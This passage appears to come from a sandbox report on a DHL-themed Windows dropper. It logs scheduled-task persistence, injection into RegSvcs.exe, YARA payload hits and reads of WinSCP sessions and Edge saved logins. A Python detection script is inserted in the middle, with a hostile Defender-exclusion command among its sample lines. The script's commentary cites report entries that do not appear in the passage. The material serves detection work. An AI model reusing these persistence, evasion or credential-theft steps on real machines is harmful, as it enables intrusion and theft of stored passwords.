Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp"
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp40DD.tmp"
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Queries volume information: C:\Users\user\Desktop\DHL_231437894819.bat.exe VolumeInformation
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Queries volume information: C:\Users\user\AppData\Roaming\uvbIwIYe.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
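The evasion entries above record three behaviours a detection engineer would want to match automatically: PowerShell adding Defender exclusions for the dropper and its copy, schtasks creating a task from an XML file in the user's Temp directory, and the dropper allocating executable memory in RegSvcs.exe and writing a PE header (4D5A) into it. The script below is an added example, written for this page and not part of the Joe Sandbox report or the sample; it runs three such rules over a handful of constructed input lines that reproduce the report's "Source: <image> | <behaviour>" layout (plus one benign control line). The ATT&CK technique numbers in the comments are the standard mappings for these behaviours; the rule names and severity labels are this example's own choices.

```python
"""Detection pass over sandbox behaviour lines (added example; not Joe Sandbox code).

Rules evaluated over 'Source: <image> | <behaviour>' lines:
  defender_exclusion  - powershell Add-MpPreference -Exclusion* (ATT&CK T1562.001)
  schtask_from_temp   - schtasks /Create whose /XML definition lives under %TEMP% (T1053.005)
  pe_injection        - RWX allocation in a foreign process followed by an MZ (4D5A) write at
                        the same base; notes whether the injector also spawned the target,
                        which is the process-hollowing pattern (T1055.012)
"""
import re
from dataclasses import dataclass

# Constructed sample: six lines taken from the observations in this section, plus one
# benign control line (explorer launching notepad) that must yield no finding.
SAMPLE_LINES = [
    r'Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uvbIwIYe.exe"',
    r'Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp"',
    r'Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"',
    r'Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write',
    r'Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A',
    r'Source: C:\Users\user\Desktop\DHL_231437894819.bat.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000',
    r'Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\notepad.exe "notepad.exe"',
]

LINE_RE = re.compile(r'^Source:\s*(?P<src>.+?)\s*\|\s*(?P<beh>.+?)\s*$')
IMAGE_RE = re.compile(r'^(?P<image>.+?\.exe)\s', re.I)          # image path before the command line
EXCL_RE = re.compile(r'-Exclusion(?:Path|Process|Extension)\s+"?(?P<what>[^"]+)"?', re.I)
XML_RE = re.compile(r'/XML\s+"?(?P<xml>[^"]+)"?', re.I)
ALLOC_RE = re.compile(r'^Memory allocated:\s*(?P<target>.+?)\s+base:\s*(?P<base>[0-9A-F]+)\s+protect:\s*(?P<prot>.+)$', re.I)
WRITE_RE = re.compile(r'^Memory written:\s*(?P<target>.+?)\s+base:\s*(?P<base>[0-9A-F]+)(?:\s+value starts with:\s*(?P<magic>[0-9A-F]+))?\s*$', re.I)
USER_WRITABLE_RE = re.compile(r'\\Users\\|\\ProgramData\\', re.I)  # exclusions here let a user-dropped file dodge Defender
TEMP_RE = re.compile(r'\\AppData\\Local\\Temp\\', re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    source: str
    detail: str


def detect(lines):
    """Run the three rules over the lines in order and return the findings."""
    events = [m.groups() for m in map(LINE_RE.match, lines) if m]
    findings = []
    spawned = set()      # (parent image, child image) pairs seen in Process created
    rwx_allocs = set()   # (injector, target, base) with execute+write protection
    for src, beh in events:
        if beh.startswith("Process created:"):
            cmd = beh[len("Process created:"):].strip()
            img = IMAGE_RE.match(cmd)
            if img:
                spawned.add((src, img.group("image").lower()))
            if "add-mppreference" in cmd.lower():
                m = EXCL_RE.search(cmd)
                what = m.group("what").strip() if m else "<unparsed>"
                sev = "high" if USER_WRITABLE_RE.search(what) else "medium"
                findings.append(Finding("defender_exclusion", src, f"{sev}: {what}"))
            elif "schtasks" in cmd.lower() and "/create" in cmd.lower():
                m = XML_RE.search(cmd)
                if m and TEMP_RE.search(m.group("xml")):
                    findings.append(Finding("schtask_from_temp", src, m.group("xml").strip()))
        elif beh.startswith("Memory allocated:"):
            m = ALLOC_RE.match(beh)
            if m and "execute" in m.group("prot").lower() and "write" in m.group("prot").lower():
                rwx_allocs.add((src, m.group("target"), m.group("base").upper()))
        elif beh.startswith("Memory written:"):
            m = WRITE_RE.match(beh)
            # Only a write that begins with the DOS header magic counts as a PE image write.
            if not m or not (m.group("magic") or "").upper().startswith("4D5A"):
                continue
            target, base = m.group("target"), m.group("base").upper()
            if src != target and (src, target, base) in rwx_allocs:
                hollowed = (src, target.lower()) in spawned
                findings.append(Finding("pe_injection", src,
                                        f"{target} @ 0x{base} (target spawned by injector: {hollowed})"))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LINES):
        print(f"[{f.rule}] {f.source} -> {f.detail}")
```

Of the three rules, pe_injection is the one worth keeping stateful: a single RWX allocation in another process is common in legitimate software (debuggers, JIT hosts), but an RWX allocation at a base that is then overwritten with an MZ header, in a child the same process just launched with no arguments, is the sequence the report shows against RegSvcs.exe and is rarely benign.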

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.uvbIwIYe.exe.4b83228.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.uvbIwIYe.exe.4b83228.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_231437894819.bat.exe.478a620.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.uvbIwIYe.exe.4b47a08.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.uvbIwIYe.exe.4b47a08.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.1534737744.0000000002C05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.3853312298.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.1534737744.0000000002C2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.3853312298.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.3853312298.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000010.00000002.3853312298.0000000002E34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: DHL_231437894819.bat.exe PID: 7972, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 7048, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: uvbIwIYe.exe PID: 7856, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 2788, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
